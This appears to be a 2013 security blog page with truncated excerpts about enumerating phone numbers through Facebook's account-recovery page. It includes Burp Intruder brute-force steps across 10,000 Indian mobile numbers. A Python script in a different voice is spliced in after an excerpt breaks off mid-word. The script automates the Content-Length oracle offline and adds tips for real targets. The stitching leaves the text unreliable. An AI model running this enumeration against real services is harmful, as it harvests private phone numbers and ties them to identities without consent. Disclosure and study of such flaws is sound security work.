
Showing posts from 2013

Facebook - Enumerating Phone Numbers

As discussed in the last post, one can use a phone number to identify an account when recovering a forgotten password. This utility can easily be misused to harvest phone numbers. How? Let me demonstrate.

Attack Scenario:

Step 1. This page, https://www.facebook.com/login/identify?ctx=recover , asks for a phone number in order to identify the user.

Step 2. I captured the request in Burp Suite and sent it to Intruder. To perform the attack I brute-forced the numbers +91973914XXXX, varying only the last 4 digits. +91 is the country code for India, and 9739 are the starting 4 digits of Vodafone numbers in Karnataka, India. Of course Intruder makes this easy. As the screenshot of the attack shows, there are 10000 attempts to be made.

Step 3. Now have a close look at the Content-Length of the responses. Content lengths such as 7182 and 8044 correspond to valid phone numbers. Content-Length 6930 is for the attempts for which the phone numbe
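The three steps above amount to a response-length oracle: every candidate number is submitted, and the numbers whose response differs in size from the common "not found" page are the registered ones. The script below is an added example, not code from the original post, that models that workflow offline. The phone numbers, names and HTML bodies are constructed stand-ins (they are not real Facebook responses), and `fake_identify_request` plays the role of the recovery endpoint; in a real test it would be replaced by the actual HTTP request that Intruder replays.

```python
"""Offline model of the Content-Length oracle used to enumerate phone numbers.

Added example: constructed responses and hypothetical numbers, not Facebook's HTML.
"""
from collections import Counter
from typing import Callable, Dict, Iterator, Tuple

# Constructed page returned for a number that is not registered (assumption:
# a fixed body, so its length is the same for every miss).
UNKNOWN_BODY = "<html><body><p>No search results</p></body></html>"


def profile_body(name: str, mutual_friends: int) -> str:
    """Constructed page for a hit: it embeds the matched profile, so it is longer."""
    return (
        "<html><body>"
        f'<div class="result"><span>{name}</span>'
        f"<span>{mutual_friends} mutual friends</span>"
        '<a href="/recover">This is my account</a></div>'
        "</body></html>"
    )


def http_response(body: str) -> bytes:
    """Wrap a body in a minimal HTTP/1.1 response with a correct Content-Length."""
    data = body.encode()
    head = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n" % len(data)
    return head + data


# Hypothetical "registered" numbers and names, standing in for the real site's
# user base; everything else in the range answers with UNKNOWN_BODY.
KNOWN_PROFILES: Dict[str, Tuple[str, int]] = {
    "+919739140042": ("Alice Example", 3),
    "+919739149876": ("Bob Example", 12),
}


def fake_identify_request(phone: str) -> bytes:
    """Stand-in for POSTing the number to /login/identify?ctx=recover."""
    if phone in KNOWN_PROFILES:
        name, mutual = KNOWN_PROFILES[phone]
        return http_response(profile_body(name, mutual))
    return http_response(UNKNOWN_BODY)


def candidates(prefix: str, digits: int) -> Iterator[str]:
    """The Intruder payload set: prefix plus every zero-padded value of `digits` digits."""
    for n in range(10 ** digits):
        yield f"{prefix}{n:0{digits}d}"


def content_length(raw: bytes) -> int:
    """Read Content-Length from a raw response; fall back to the body size."""
    head, _, body = raw.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            return int(value.strip())
    return len(body)


def enumerate_numbers(
    prefix: str, digits: int, send: Callable[[str], bytes]
) -> Tuple[int, Dict[str, int]]:
    """Submit every candidate, take the most common length as the 'miss' baseline,
    and report every number whose response length deviates from it."""
    lengths = {phone: content_length(send(phone)) for phone in candidates(prefix, digits)}
    baseline, _ = Counter(lengths.values()).most_common(1)[0]
    hits = {phone: length for phone, length in lengths.items() if length != baseline}
    return baseline, hits


if __name__ == "__main__":
    base, found = enumerate_numbers("+91973914", 4, fake_identify_request)
    print(f"baseline (not registered) Content-Length: {base}")
    for phone, length in sorted(found.items()):
        print(f"{phone}  Content-Length {length}  -> registered")
```

Sorting Intruder's results by the length column is exactly what `enumerate_numbers` automates: the most frequent length is the "no such account" page and everything else is worth a second look. One caveat for real targets: per-request tokens or nonces can make the miss page vary by a few bytes, so group lengths into bands rather than relying on an exact match, and expect rate limiting or CAPTCHAs long before 10000 requests complete.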

Facebook: A Privacy Error ??

If you want to identify your Facebook account, there are 3 ways you can identify yourself:

1. Provide your e-mail ID.
2. Provide your phone number (if you have given this in your profile).
3. Provide your user ID (the unique ID assigned to you by Facebook).

The screenshot below shows the page (https://www.facebook.com/login/identify?ctx=recover) used to identify your account in case you want to recover it. The other way to look at this is that it can also be misused to validate someone's phone number. Let's say my phone number is 9739141XXX. I put it there and I see myself, so the relation between phone number and profile can be confirmed. But I have set my privacy settings to the most restrictive option, "Only Friends" (shown in the screenshot below), for who can see my phone number. Isn't this a privacy breach? But here is the catch. Facebook is smart and keeps a log of the public IPs you have come from. If you have logged in from the same public IP before, this privacy se